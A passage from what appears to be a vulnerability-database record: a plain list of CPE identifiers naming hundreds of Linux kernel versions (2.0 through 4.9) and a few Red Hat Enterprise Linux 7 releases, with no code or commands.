"cpe:/o:linux:linux_kernel:2.6.24.7", "cpe:/o:linux:linux_kernel:2.6.33:rc4", "cpe:/o:redhat:enterprise_linux_server_eus:7.5", "cpe:/o:linux:linux_kernel:3.4:rc4", "cpe:/o:linux:linux_kernel:2.6.18:rc2", "cpe:/o:linux:linux_kernel:2.6.26.6", "cpe:/o:linux:linux_kernel:2.6.25.12", "cpe:/o:linux:linux_kernel:3.4.103", "cpe:/o:linux:linux_kernel:2.6.31:rc5", "cpe:/o:linux:linux_kernel:4.9.2", "cpe:/o:linux:linux_kernel:2.5.75", "cpe:/o:linux:linux_kernel:2.6.16.56", "cpe:/o:linux:linux_kernel:3.0.28", "cpe:/o:linux:linux_kernel:2.6.3", "cpe:/o:linux:linux_kernel:4.1:rc6", "cpe:/o:linux:linux_kernel:2.6.19:rc2", "cpe:/o:linux:linux_kernel:2.3.99:pre9", "cpe:/o:linux:linux_kernel:4.4.87", "cpe:/o:linux:linux_kernel:2.1.58", "cpe:/o:linux:linux_kernel:4.1.23", "cpe:/o:linux:linux_kernel:2.3.99:pre8", "cpe:/o:linux:linux_kernel:2.6.14.2", "cpe:/o:linux:linux_kernel:2.1.13", "cpe:/o:linux:linux_kernel:2.6.16:rc6", "cpe:/o:linux:linux_kernel:2.5.15", "cpe:/o:linux:linux_kernel:2.6.25.17", "cpe:/o:linux:linux_kernel:3.0.25", "cpe:/o:linux:linux_kernel:3.18.22", "cpe:/o:linux:linux_kernel:2.1.23", "cpe:/o:linux:linux_kernel:2.1.60", "cpe:/o:linux:linux_kernel:2.4.22", "cpe:/o:linux:linux_kernel:4.9.8", "cpe:/o:linux:linux_kernel:4.1.11", "cpe:/o:linux:linux_kernel:3.2.75", "cpe:/o:linux:linux_kernel:3.4.47", "cpe:/o:linux:linux_kernel:2.1.80", "cpe:/o:linux:linux_kernel:3.9.1", "cpe:/o:linux:linux_kernel:3.14.66", "cpe:/o:linux:linux_kernel:2.6.32.21", "cpe:/o:linux:linux_kernel:3.15.2", "cpe:/o:linux:linux_kernel:3.13.4", "cpe:/o:linux:linux_kernel:3.18.6", "cpe:/o:linux:linux_kernel:4.4.50", "cpe:/o:linux:linux_kernel:3.0.56", "cpe:/o:linux:linux_kernel:2.6.34", "cpe:/o:linux:linux_kernel:3.3:rc2", "cpe:/o:linux:linux_kernel:2.6.16.48", "cpe:/o:linux:linux_kernel:2.6.38.2", "cpe:/o:linux:linux_kernel:2.6.27.47", "cpe:/o:linux:linux_kernel:3.0.1", "cpe:/o:linux:linux_kernel:4.4.6", "cpe:/o:linux:linux_kernel:3.12.13", "cpe:/o:linux:linux_kernel:3.12.30", "cpe:/o:linux:linux_kernel:2.6.11.10", "cpe:/o:linux:linux_kernel:2.6.29.4", "cpe:/o:linux:linux_kernel:3.9:rc5", "cpe:/o:linux:linux_kernel:4.1.34", "cpe:/o:linux:linux_kernel:4.1.3", "cpe:/o:linux:linux_kernel:3.2.68", "cpe:/o:linux:linux_kernel:3.2.3", "cpe:/o:linux:linux_kernel:3.10.27", "cpe:/o:linux:linux_kernel:2.2.24:rc4", "cpe:/o:linux:linux_kernel:3.9.8::~~~~arm64~", "cpe:/o:linux:linux_kernel:2.6.16.12", "cpe:/o:linux:linux_kernel:3.7.2", "cpe:/o:linux:linux_kernel:3.0.58", "cpe:/o:linux:linux_kernel:2.3.33", "cpe:/o:linux:linux_kernel:3.10.69", "cpe:/o:linux:linux_kernel:2.4.0:test4", "cpe:/o:linux:linux_kernel:3.0.8", "cpe:/o:linux:linux_kernel:2.6.27.42", "cpe:/o:linux:linux_kernel:3.4.78", "cpe:/o:linux:linux_kernel:4.2:rc5", "cpe:/o:linux:linux_kernel:2.6.27.61", "cpe:/o:linux:linux_kernel:2.6.25:rc2", "cpe:/o:linux:linux_kernel:2.1.98", "cpe:/o:linux:linux_kernel:4.4.126", "cpe:/o:linux:linux_kernel:2.4.32:pre2", "cpe:/o:linux:linux_kernel:3.10.24", "cpe:/o:linux:linux_kernel:2.6.31:rc8", "cpe:/o:linux:linux_kernel:4.2:rc6", "cpe:/o:linux:linux_kernel:2.6.28.7", "cpe:/o:linux:linux_kernel:2.6.32.51", "cpe:/o:linux:linux_kernel:2.6.20.21", "cpe:/o:linux:linux_kernel:2.6.35.4", "cpe:/o:linux:linux_kernel:2.6.30:rc7", "cpe:/o:linux:linux_kernel:3.6:rc5", "cpe:/o:linux:linux_kernel:2.1.1", "cpe:/o:linux:linux_kernel:4.7:rc5", "cpe:/o:linux:linux_kernel:4.1.49", "cpe:/o:linux:linux_kernel:3.10.56", "cpe:/o:linux:linux_kernel:4.1:rc4", "cpe:/o:linux:linux_kernel:3.0.66", "cpe:/o:linux:linux_kernel:4.0.5", "cpe:/o:linux:linux_kernel:4.4.106", "cpe:/o:linux:linux_kernel:3.19.3", "cpe:/o:linux:linux_kernel:3.19.1", "cpe:/o:linux:linux_kernel:3.2.17", "cpe:/o:linux:linux_kernel:3.18.65", "cpe:/o:linux:linux_kernel:3.2.77", "cpe:/o:linux:linux_kernel:2.5.60", "cpe:/o:linux:linux_kernel:2.6.32.56", "cpe:/o:linux:linux_kernel:2.6.4:rc2", "cpe:/o:linux:linux_kernel:3.0.60", "cpe:/o:linux:linux_kernel:3.2.6", "cpe:/o:linux:linux_kernel:4.1.32", "cpe:/o:linux:linux_kernel:2.6.23.5", "cpe:/o:linux:linux_kernel:2.6.20.14", "cpe:/o:linux:linux_kernel:2.6.32.22", "cpe:/o:linux:linux_kernel:4.4.69", "cpe:/o:linux:linux_kernel:3.7.5", "cpe:/o:linux:linux_kernel:2.6.20.18", "cpe:/o:linux:linux_kernel:2.6.27.57", "cpe:/o:linux:linux_kernel:2.6.17.13", "cpe:/o:linux:linux_kernel:2.4.18", "cpe:/o:linux:linux_kernel:4.5.7", "cpe:/o:linux:linux_kernel:2.1.53", "cpe:/o:linux:linux_kernel:3.4.3::~~~~x86~", "cpe:/o:linux:linux_kernel:2.3.42", "cpe:/o:linux:linux_kernel:2.3.22", "cpe:/o:linux:linux_kernel:3.14.3", "cpe:/o:linux:linux_kernel:2.6.11:rc3", "cpe:/o:linux:linux_kernel:3.14:rc7", "cpe:/o:linux:linux_kernel:3.10.82", "cpe:/o:linux:linux_kernel:3.2.1", "cpe:/o:linux:linux_kernel:3.10.101", "cpe:/o:linux:linux_kernel:2.4.30", "cpe:/o:linux:linux_kernel:2.6.26.3", "cpe:/o:linux:linux_kernel:3.4.3", "cpe:/o:linux:linux_kernel:2.6.6", "cpe:/o:linux:linux_kernel:3.10.46", "cpe:/o:linux:linux_kernel:2.6.20.12", "cpe:/o:linux:linux_kernel:4.4.70", "cpe:/o:linux:linux_kernel:2.1.39", "cpe:/o:linux:linux_kernel:3.12.5", "cpe:/o:linux:linux_kernel:2.1.106", "cpe:/o:linux:linux_kernel:2.6.38.6", "cpe:/o:linux:linux_kernel:2.5.35", "cpe:/o:linux:linux_kernel:3.12.49", "cpe:/o:linux:linux_kernel:3.4.32", "cpe:/o:linux:linux_kernel:2.6.12.1", "cpe:/o:linux:linux_kernel:2.6.26:rc5", "cpe:/o:linux:linux_kernel:3.18.7", "cpe:/o:linux:linux_kernel:4.7.2", "cpe:/o:linux:linux_kernel:3.10.9::~~~~arm64~", "cpe:/o:linux:linux_kernel:3.12.21", "cpe:/o:linux:linux_kernel:3.0.98", "cpe:/o:linux:linux_kernel:4.5.0:rc7", "cpe:/o:linux:linux_kernel:4.0.8", "cpe:/o:linux:linux_kernel:2.6.16.39", "cpe:/o:linux:linux_kernel:2.6.27.22", "cpe:/o:linux:linux_kernel:3.3.2", "cpe:/o:linux:linux_kernel:2.0.7", "cpe:/o:linux:linux_kernel:3.0:rc1", "cpe:/o:linux:linux_kernel:2.6.28:rc8", "cpe:/o:linux:linux_kernel:3.0.65", "cpe:/o:linux:linux_kernel:3.17.6", "cpe:/o:linux:linux_kernel:4.2:rc8", "cpe:/o:linux:linux_kernel:2.6.30.1", "cpe:/o:linux:linux_kernel:4.1.5", "cpe:/o:linux:linux_kernel:2.6.8:rc3", "cpe:/o:linux:linux_kernel:2.5.39", "cpe:/o:linux:linux_kernel:2.6.20.3", "cpe:/o:linux:linux_kernel:2.2.23", "cpe:/o:linux:linux_kernel:4.4.21", "cpe:/o:linux:linux_kernel:2.1.37", "cpe:/o:linux:linux_kernel:2.6.37:rc4", "cpe:/o:linux:linux_kernel:2.6.16.8", "cpe:/o:linux:linux_kernel:2.6.27.1", "cpe:/o:linux:linux_kernel:3.4.41", "cpe:/o:linux:linux_kernel:3.19.5", "cpe:/o:linux:linux_kernel:3.4.20", "cpe:/o:linux:linux_kernel:4.4.43", "cpe:/o:linux:linux_kernel:3.12.1", "cpe:/o:linux:linux_kernel:4.4.128", "cpe:/o:linux:linux_kernel:3.3.3", "cpe:/o:linux:linux_kernel:4.4.84", "cpe:/o:linux:linux_kernel:3.14.42", "cpe:/o:linux:linux_kernel:4.4.85", "cpe:/o:linux:linux_kernel:3.2.19", "cpe:/o:linux:linux_kernel:4.1.0", "cpe:/o:linux:linux_kernel:4.4", "cpe:/o:linux:linux_kernel:2.6.16.25", "cpe:/o:linux:linux_kernel:2.6.32.12", "cpe:/o:linux:linux_kernel:2.5.56", "cpe:/o:linux:linux_kernel:4.4.138", "cpe:/o:linux:linux_kernel:2.6.22.9", "cpe:/o:linux:linux_kernel:2.6.29.1", "cpe:/o:linux:linux_kernel:3.13.2", "cpe:/o:linux:linux_kernel:2.6.18.5", "cpe:/o:linux:linux_kernel:2.3.8", "cpe:/o:linux:linux_kernel:4.4.124", "cpe:/o:linux:linux_kernel:3.18.28", "cpe:/o:linux:linux_kernel:2.5.63", "cpe:/o:linux:linux_kernel:2.6.27.19", "cpe:/o:linux:linux_kernel:2.3.99:pre6", "cpe:/o:linux:linux_kernel:2.6.2:rc1", "cpe:/o:linux:linux_kernel:3.7.7", "cpe:/o:linux:linux_kernel:2.0.11", "cpe:/o:linux:linux_kernel:2.4.0:test12", "cpe:/o:linux:linux_kernel:3.4.37", "cpe:/o:linux:linux_kernel:2.6.35.2", "cpe:/o:linux:linux_kernel:4.1.6", "cpe:/o:linux:linux_kernel:2.6.21:rc7", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/o:linux:linux_kernel:3.10.39", "cpe:/o:linux:linux_kernel:2.6.16.17", "cpe:/o:linux:linux_kernel:3.1:rc4", "cpe:/o:linux:linux_kernel:2.6.8:rc4", "cpe:/o:linux:linux_kernel:4.5", "cpe:/o:linux:linux_kernel:4.1.41", "cpe:/o:linux:linux_kernel:2.1.59", "cpe:/o:linux:linux_kernel:2.6.14:rc1", "cpe:/o:linux:linux_kernel:2.6.26:rc3", "cpe:/o:linux:linux_kernel:3.0.91", "cpe:/o:linux:linux_kernel:4.3.0", "cpe:/o:linux:linux_kernel:3.11.8", "cpe:/o:linux:linux_kernel:2.2.4", "cpe:/o:linux:linux_kernel:2.6.32:rc6", "cpe:/o:linux:linux_kernel:2.6.26.1", "cpe:/o:linux:linux_kernel:3.2.16", "cpe:/o:linux:linux_kernel:2.6.32.19", "cpe:/o:linux:linux_kernel:3.0.62", "cpe:/o:linux:linux_kernel:4.7", "cpe:/o:linux:linux_kernel:2.2.21:pre2", "cpe:/o:linux:linux_kernel:2.5.3", "cpe:/o:linux:linux_kernel:2.6.5", "cpe:/o:linux:linux_kernel:3.10.28", "cpe:/o:linux:linux_kernel:3.0.55", "cpe:/o:linux:linux_kernel:2.3.23", "cpe:/o:linux:linux_kernel:4.8.6", "cpe:/o:linux:linux_kernel:2.6.38:rc8", "cpe:/o:linux:linux_kernel:3.1.1", "cpe:/o:linux:linux_kernel:3.14.41", "cpe:/o:linux:linux_kernel:2.6.27:rc2", "cpe:/o:linux:linux_kernel:3.4.74", "cpe:/o:linux:linux_kernel:3.2.1::~~~~x86~", "cpe:/o:linux:linux_kernel:3.2.5", "cpe:/o:linux:linux_kernel:2.4.16", "cpe:/o:linux:linux_kernel:3.18.23", "cpe:/o:linux:linux_kernel:3.9.3", "cpe:/o:linux:linux_kernel:3.18.48", "cpe:/o:linux:linux_kernel:2.6.12:rc4", "cpe:/o:linux:linux_kernel:3.0.46", "cpe:/o:linux:linux_kernel:3.0.76", "cpe:/o:linux:linux_kernel:2.6.32.28", "cpe:/o:linux:linux_kernel:2.5.62", "cpe:/o:linux:linux_kernel:2.6.16.26", "cpe:/o:linux:linux_kernel:4.4.135", "cpe:/o:linux:linux_kernel:2.6.16.32", "cpe:/o:linux:linux_kernel:3.11.4", "cpe:/o:linux:linux_kernel:2.6.27.21", "cpe:/o:linux:linux_kernel:3.0.87", "cpe:/o:linux:linux_kernel:3.13.6", "cpe:/o:linux:linux_kernel:3.19.8", "cpe:/o:linux:linux_kernel:3.18.62", "cpe:/o:linux:linux_kernel:4.4.64", "cpe:/o:linux:linux_kernel:3.2:rc6", "cpe:/o:linux:linux_kernel:2.6.39:rc1", "cpe:/o:linux:linux_kernel:2.6.14.3", "cpe:/o:linux:linux_kernel:2.6.31:rc2", "cpe:/o:linux:linux_kernel:3.6.6", "cpe:/o:linux:linux_kernel:2.4.18:pre7", "cpe:/o:linux:linux_kernel:2.6.19:rc5", "cpe:/o:linux:linux_kernel:3.2.2", "cpe:/o:linux:linux_kernel:2.6.24.6", "cpe:/o:linux:linux_kernel:3.14.38", "cpe:/o:linux:linux_kernel:2.3.19", "cpe:/o:linux:linux_kernel:3.11.9", "cpe:/o:linux:linux_kernel:2.6.32.11", "cpe:/o:linux:linux_kernel:4.1.22", "cpe:/o:linux:linux_kernel:3.10.8", "cpe:/o:linux:linux_kernel:2.4.4", "cpe:/o:linux:linux_kernel:3.10.80", "cpe:/o:linux:linux_kernel:2.6.36:rc5", "cpe:/o:linux:linux_kernel:2.6.32.27", "cpe:/o:linux:linux_kernel:3.12.38", "cpe:/o:linux:linux_kernel:2.6.16:rc5", "cpe:/o:linux:linux_kernel:2.2.3", "cpe:/o:linux:linux_kernel:4.4.100", "cpe:/o:linux:linux_kernel:4.1.18", "cpe:/o:linux:linux_kernel:3.7.6", "cpe:/o:linux:linux_kernel:3.11.2", "cpe:/o:linux:linux_kernel:4.4.129", "cpe:/o:linux:linux_kernel:3.5.6", "cpe:/o:linux:linux_kernel:2.6.16.1", "cpe:/o:linux:linux_kernel:3.4.22", "cpe:/o:linux:linux_kernel:2.0.22", "cpe:/o:linux:linux_kernel:2.6.17.3", "cpe:/o:linux:linux_kernel:3.9.9", "cpe:/o:redhat:enterprise_linux_server_aus:7.4", "cpe:/o:linux:linux_kernel:4.4.119", "cpe:/o:linux:linux_kernel:3.14.55", "cpe:/o:linux:linux_kernel:2.6.30", "cpe:/o:linux:linux_kernel:2.4.33.5", "cpe:/o:linux:linux_kernel:4.9:rc2", "cpe:/o:linux:linux_kernel:3.0.18", "cpe:/o:linux:linux_kernel:2.6.4:rc1", "cpe:/o:linux:linux_kernel:2.6.16.33", "cpe:/o:linux:linux_kernel:2.6.22.12", "cpe:/o:linux:linux_kernel:2.2.16", "cpe:/o:linux:linux_kernel:2.6.21.4", "cpe:/o:linux:linux_kernel:3.10.83", "cpe:/o:linux:linux_kernel:3.4.53", "cpe:/o:linux:linux_kernel:2.6.15:rc6", "cpe:/o:linux:linux_kernel:2.6.33", "cpe:/o:linux:linux_kernel:2.6.19.3", "cpe:/o:linux:linux_kernel:4.4.58", "cpe:/o:linux:linux_kernel:3.10.75", "cpe:/o:linux:linux_kernel:2.6.18.3", "cpe:/o:linux:linux_kernel:3.2::~~~~x86~", "cpe:/o:linux:linux_kernel:3.4.26", "cpe:/o:linux:linux_kernel:2.6.33.15", "cpe:/o:linux:linux_kernel:2.6.36", "cpe:/o:linux:linux_kernel:4.1.47", "cpe:/o:linux:linux_kernel:2.1.66", "cpe:/o:linux:linux_kernel:3.0.19", "cpe:/o:linux:linux_kernel:2.4.35.2", "cpe:/o:linux:linux_kernel:3.14.53", "cpe:/o:linux:linux_kernel:4.4.18", "cpe:/o:linux:linux_kernel:3.12.55", "cpe:/o:linux:linux_kernel:2.6.31.10", "cpe:/o:linux:linux_kernel:2.6.18.6", "cpe:/o:linux:linux_kernel:2.6.20.16", "cpe:/o:linux:linux_kernel:2.6.0", "cpe:/o:linux:linux_kernel:3.19", "cpe:/o:linux:linux_kernel:2.6.27.13", "cpe:/o:linux:linux_kernel:2.6.28:rc2", "cpe:/o:linux:linux_kernel:3.18.12", "cpe:/o:linux:linux_kernel:3.1.5", "cpe:/o:linux:linux_kernel:2.4.33.2", "cpe:/o:linux:linux_kernel:2.4.0:test9", "cpe:/o:linux:linux_kernel:4.4.9", "cpe:/o:linux:linux_kernel:2.6.29:rc2", "cpe:/o:linux:linux_kernel:2.6.2", "cpe:/o:linux:linux_kernel:3.2:rc7", "cpe:/o:linux:linux_kernel:3.18.35", "cpe:/o:linux:linux_kernel:2.1.68", "cpe:/o:linux:linux_kernel:2.6.22", "cpe:/o:linux:linux_kernel:2.6.13.2", "cpe:/o:linux:linux_kernel:3.0.26", "cpe:/o:linux:linux_kernel:2.0.5", "cpe:/o:linux:linux_kernel:3.0.92", "cpe:/o:linux:linux_kernel:2.6.21.5", "cpe:/o:linux:linux_kernel:3.14.65", "cpe:/o:linux:linux_kernel:2.6.32.35", "cpe:/o:linux:linux_kernel:2.6.11:rc2", "cpe:/o:linux:linux_kernel:3.8.1", "cpe:/o:linux:linux_kernel:2.6.22.5", "cpe:/o:linux:linux_kernel:2.6.16.59", "cpe:/o:linux:linux_kernel:2.1.38", "cpe:/o:linux:linux_kernel:2.1.40", "cpe:/o:linux:linux_kernel:2.4.23", "cpe:/o:linux:linux_kernel:3.4.72", "cpe:/o:linux:linux_kernel:2.6.32", "cpe:/o:linux:linux_kernel:2.3.36", "cpe:/o:linux:linux_kernel:3.16.4", "cpe:/o:linux:linux_kernel:2.5.21", "cpe:/o:linux:linux_kernel:2.6.27:rc7", "cpe:/o:linux:linux_kernel:3.0.73", "cpe:/o:linux:linux_kernel:4.4.88", "cpe:/o:linux:linux_kernel:4.7:rc2", "cpe:/o:linux:linux_kernel:3.10.25", "cpe:/o:linux:linux_kernel:4.1.16", "cpe:/o:linux:linux_kernel:2.6.16.36", "cpe:/o:linux:linux_kernel:2.6.0:test2", "cpe:/o:linux:linux_kernel:2.2.10", "cpe:/o:linux:linux_kernel:2.1.34", "cpe:/o:linux:linux_kernel:2.6.15.10", "cpe:/o:linux:linux_kernel:2.3.43", "cpe:/o:linux:linux_kernel:4.4.62", "cpe:/o:linux:linux_kernel:2.6.0:test7", "cpe:/o:linux:linux_kernel:2.6.2:rc3", "cpe:/o:linux:linux_kernel:2.5.9", "cpe:/o:linux:linux_kernel:2.2.24:rc2", "cpe:/o:linux:linux_kernel:2.6.16.37", "cpe:/o:linux:linux_kernel:2.1.24", "cpe:/o:linux:linux_kernel:3.12.45", "cpe:/o:linux:linux_kernel:3.13.5", "cpe:/o:linux:linux_kernel:3.10.93", "cpe:/o:linux:linux_kernel:3.4", "cpe:/o:linux:linux_kernel:2.6.13.5", "cpe:/o:linux:linux_kernel:2.6.0:test8", "cpe:/o:linux:linux_kernel:2.2.16:pre5", "cpe:/o:linux:linux_kernel:3.4.1::~~~~x86~", "cpe:/o:linux:linux_kernel:4.8.1", "cpe:/o:linux:linux_kernel:2.4.12", "cpe:/o:linux:linux_kernel:2.5.12", "cpe:/o:linux:linux_kernel:4.4.115", "cpe:/o:linux:linux_kernel:2.2.6", "cpe:/o:linux:linux_kernel:3.18.25", "cpe:/o:linux:linux_kernel:3.0.100", "cpe:/o:linux:linux_kernel:2.6.17.9", "cpe:/o:linux:linux_kernel:2.5.58", "cpe:/o:linux:linux_kernel:3.17.3::~~~~arm64~", "cpe:/o:linux:linux_kernel:3.4.17", "cpe:/o:linux:linux_kernel:2.6.28.3", "cpe:/o:linux:linux_kernel:2.1.14", "cpe:/o:linux:linux_kernel:3.4.85", "cpe:/o:linux:linux_kernel:2.3.9", "cpe:/o:linux:linux_kernel:3.10.16", "cpe:/o:linux:linux_kernel:3.6.9", "cpe:/o:linux:linux_kernel:3.18.1", "cpe:/o:linux:linux_kernel:2.6.17:rc6", "cpe:/o:linux:linux_kernel:4.4.101", "cpe:/o:linux:linux_kernel:4.1.48", "cpe:/o:linux:linux_kernel:2.1.12", "cpe:/o:linux:linux_kernel:2.6.33:rc8", "cpe:/o:linux:linux_kernel:2.6.32:rc1", "cpe:/o:linux:linux_kernel:2.4.0:test5", "cpe:/o:linux:linux_kernel:2.6.32:rc5", "cpe:/o:linux:linux_kernel:2.5.53", "cpe:/o:linux:linux_kernel:2.1.82", "cpe:/o:linux:linux_kernel:3.14.21", "cpe:/o:linux:linux_kernel:3.0.68", "cpe:/o:linux:linux_kernel:3.10.44", "cpe:/o:linux:linux_kernel:3.3:rc4", "cpe:/o:linux:linux_kernel:4.1.27", "cpe:/o:linux:linux_kernel:3.10.42", "cpe:/o:linux:linux_kernel:3.15.1", "cpe:/o:linux:linux_kernel:2.6.18.2", "cpe:/o:linux:linux_kernel:2.3.99:pre2", "cpe:/o:linux:linux_kernel:2.2.17:pre14", "cpe:/o:linux:linux_kernel:2.5.24", "cpe:/o:linux:linux_kernel:3.2.74", "cpe:/o:linux:linux_kernel:3.18.29", "cpe:/o:linux:linux_kernel:3.8.7", "cpe:/o:linux:linux_kernel:2.6.32.4", "cpe:/o:linux:linux_kernel:4.2:rc1", "cpe:/o:linux:linux_kernel:2.6.20.6", "cpe:/o:linux:linux_kernel:2.6.7:rc2", "cpe:/o:linux:linux_kernel:2.4.30:rc2", "cpe:/o:linux:linux_kernel:3.4:rc6:~~~~x86~", "cpe:/o:linux:linux_kernel:2.6.37.1", "cpe:/o:linux:linux_kernel:2.6.9", "cpe:/o:linux:linux_kernel:2.6.19.7", "cpe:/o:linux:linux_kernel:2.6.20.2", "cpe:/o:linux:linux_kernel:2.6.32.33", "cpe:/o:linux:linux_kernel:2.3.34", "cpe:/o:linux:linux_kernel:4.8.11", "cpe:/o:linux:linux_kernel:4.2:rc7", "cpe:/o:linux:linux_kernel:3.12.56", "cpe:/o:linux:linux_kernel:2.1.92", "cpe:/o:linux:linux_kernel:2.6.39:rc5", "cpe:/o:linux:linux_kernel:3.0.37", "cpe:/o:linux:linux_kernel:2.1.72", "cpe:/o:linux:linux_kernel:2.6.27.27", "cpe:/o:linux:linux_kernel:4.4.3", "cpe:/o:linux:linux_kernel:2.6.10", "cpe:/o:linux:linux_kernel:2.6.0:test10", "cpe:/o:linux:linux_kernel:3.18.0", "cpe:/o:linux:linux_kernel:2.6.27:rc6", "cpe:/o:linux:linux_kernel:2.6.17.8", "cpe:/o:linux:linux_kernel:2.6.11.12", "cpe:/o:linux:linux_kernel:4.9.7", "cpe:/o:linux:linux_kernel:2.6.11", "cpe:/o:linux:linux_kernel:2.6.27.35", "cpe:/o:linux:linux_kernel:3.0.34", "cpe:/o:linux:linux_kernel:2.6.15.5", "cpe:/o:linux:linux_kernel:2.6.21:rc5", "cpe:/o:linux:linux_kernel:3.10.1", "cpe:/o:linux:linux_kernel:2.4.18:pre3", "cpe:/o:linux:linux_kernel:2.6.36:rc6", "cpe:/o:linux:linux_kernel:2.6.32.13", "cpe:/o:linux:linux_kernel:3.12.58", "cpe:/o:linux:linux_kernel:2.6.28:rc4", "cpe:/o:linux:linux_kernel:2.6.27.43", "cpe:/o:linux:linux_kernel:3.0", "cpe:/o:linux:linux_kernel:4.4.4", "cpe:/o:linux:linux_kernel:2.6.12:rc3", "cpe:/o:linux:linux_kernel:2.1.9", "cpe:/o:linux:linux_kernel:2.6.32.32", "cpe:/o:linux:linux_kernel:4.4.0", "cpe:/o:linux:linux_kernel:2.6.17:rc4", "cpe:/o:linux:linux_kernel:2.6.15.3", "cpe:/o:linux:linux_kernel:3.10.52", "cpe:/o:linux:linux_kernel:2.6.38:rc3", "cpe:/o:linux:linux_kernel:3.10.58", "cpe:/o:linux:linux_kernel:3.12.44", "cpe:/o:linux:linux_kernel:2.6.19:rc1", "cpe:/o:linux:linux_kernel:3.12.19", "cpe:/o:linux:linux_kernel:2.5.17", "cpe:/o:linux:linux_kernel:3.13.9", "cpe:/o:linux:linux_kernel:3.12.2", "cpe:/o:linux:linux_kernel:2.6.27.14", "cpe:/o:linux:linux_kernel:3.18.5", "cpe:/o:linux:linux_kernel:4.9.1", "cpe:/o:linux:linux_kernel:3.10.1::~~~~arm64~", "cpe:/o:linux:linux_kernel:4.8.17", "cpe:/o:linux:linux_kernel:2.5.61", "cpe:/o:linux:linux_kernel:2.5.23", "cpe:/o:linux:linux_kernel:2.4.19:pre3", "cpe:/o:linux:linux_kernel:2.6.33.13", "cpe:/o:linux:linux_kernel:2.1.17", "cpe:/o:linux:linux_kernel:2.0.27", "cpe:/o:linux:linux_kernel:2.6.7:rc3", "cpe:/o:linux:linux_kernel:2.6.20:rc7", "cpe:/o:linux:linux_kernel:2.6.31.11", "cpe:/o:linux:linux_kernel:4.4.89", "cpe:/o:linux:linux_kernel:2.6.36.4", "cpe:/o:linux:linux_kernel:4.2.2", "cpe:/o:linux:linux_kernel:4.1.52", "cpe:/o:linux:linux_kernel:2.6.20:rc3", "cpe:/o:linux:linux_kernel:2.6.17.14", "cpe:/o:linux:linux_kernel:4.1.36", "cpe:/o:linux:linux_kernel:2.6.32.50", "cpe:/o:linux:linux_kernel:2.5.42", "cpe:/o:linux:linux_kernel:2.6.16.7", "cpe:/o:linux:linux_kernel:3.10.77", "cpe:/o:linux:linux_kernel:3.0.32", "cpe:/o:linux:linux_kernel:2.5.45", "cpe:/o:linux:linux_kernel:3.2.70", "cpe:/o:linux:linux_kernel:2.6.5:rc1", "cpe:/o:linux:linux_kernel:2.6.20.19", "cpe:/o:linux:linux_kernel:2.4.35", "cpe:/o:linux:linux_kernel:2.6.31:rc9", "cpe:/o:linux:linux_kernel:2.6.15:rc7", "cpe:/o:linux:linux_kernel:3.14.67", "cpe:/o:linux:linux_kernel:3.4.95", "cpe:/o:linux:linux_kernel:3.10.31", "cpe:/o:linux:linux_kernel:3.18.33", "cpe:/o:linux:linux_kernel:2.6.23.4", "cpe:/o:linux:linux_kernel:2.6.18.7", "cpe:/o:linux:linux_kernel:3.7.10", "cpe:/o:linux:linux_kernel:2.1.131", "cpe:/o:linux:linux_kernel:4.9.5", "cpe:/o:linux:linux_kernel:4.6.1", "cpe:/o:linux:linux_kernel:2.6.27:rc1", "cpe:/o:linux:linux_kernel:2.6.32.14", "cpe:/o:linux:linux_kernel:3.4.108", "cpe:/o:linux:linux_kernel:4.1:rc1", "cpe:/o:linux:linux_kernel:2.6.22.22", "cpe:/o:linux:linux_kernel:2.6.24:rc6", "cpe:/o:linux:linux_kernel:3.4.88", "cpe:/o:linux:linux_kernel:2.3.3", "cpe:/o:linux:linux_kernel:3.14.28", "cpe:/o:linux:linux_kernel:4.8.2", "cpe:/o:linux:linux_kernel:3.14.2", "cpe:/o:linux:linux_kernel:2.4.33:pre1", "cpe:/o:linux:linux_kernel:2.6.24:rc3", "cpe:/o:linux:linux_kernel:3.4.55", "cpe:/o:linux:linux_kernel:3.3.8", "cpe:/o:linux:linux_kernel:3.0.16", "cpe:/o:linux:linux_kernel:2.3.48", "cpe:/o:linux:linux_kernel:3.4.96", "cpe:/o:linux:linux_kernel:4.4.45", "cpe:/o:linux:linux_kernel:2.6.25:rc4", "cpe:/o:linux:linux_kernel:2.6.16.47", "cpe:/o:linux:linux_kernel:3.4.64", "cpe:/o:linux:linux_kernel:2.6.32.44", "cpe:/o:linux:linux_kernel:2.1.86", "cpe:/o:linux:linux_kernel:3.2.64", "cpe:/o:linux:linux_kernel:3.4:rc2", "cpe:/o:linux:linux_kernel:2.6.18:rc6", "cpe:/o:linux:linux_kernel:2.1.122", "cpe:/o:linux:linux_kernel:2.6.32.30", "cpe:/o:linux:linux_kernel:2.6.29:rc8", "cpe:/o:linux:linux_kernel:3.4:rc2:~~~~x86~", "cpe:/o:linux:linux_kernel:4.4.133", "cpe:/o:linux:linux_kernel:2.2.21:pre1", "cpe:/o:linux:linux_kernel:2.6.27.25", "cpe:/o:linux:linux_kernel:2.1.10", "cpe:/o:linux:linux_kernel:2.6.32.48", "cpe:/o:linux:linux_kernel:3.0.38", "cpe:/o:linux:linux_kernel:2.6.0:test11", "cpe:/o:linux:linux_kernel:4.1.26", "cpe:/o:linux:linux_kernel:4.4.137", "cpe:/o:linux:linux_kernel:2.5.40", "cpe:/o:linux:linux_kernel:2.6.15.4", "cpe:/o:linux:linux_kernel:3.13.3", "cpe:/o:linux:linux_kernel:3.2.4", "cpe:/o:linux:linux_kernel:3.4.29", "cpe:/o:linux:linux_kernel:2.4.30:rc3", "cpe:/o:linux:linux_kernel:3.4.15", "cpe:/o:linux:linux_kernel:2.0.15", "cpe:/o:linux:linux_kernel:2.4.27:pre2", "cpe:/o:linux:linux_kernel:2.1.112", "cpe:/o:linux:linux_kernel:2.4.13", "cpe:/o:linux:linux_kernel:2.6.35.9", "cpe:/o:linux:linux_kernel:3.2.15", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:linux:linux_kernel:2.6.25.20", "cpe:/o:linux:linux_kernel:4.4.90", "cpe:/o:linux:linux_kernel:4.8.13", "cpe:/o:linux:linux_kernel:4.4.114", "cpe:/o:linux:linux_kernel:3.10.53", "cpe:/o:linux:linux_kernel:3.1.9", "cpe:/o:linux:linux_kernel:2.0.9", "cpe:/o:linux:linux_kernel:2.6.31.4", "cpe:/o:linux:linux_kernel:2.6.27.20", "cpe:/o:linux:linux_kernel:2.2.9", "cpe:/o:linux:linux_kernel:2.6.32.5", "cpe:/o:linux:linux_kernel:2.6.20.5", "cpe:/o:linux:linux_kernel:2.3.29", 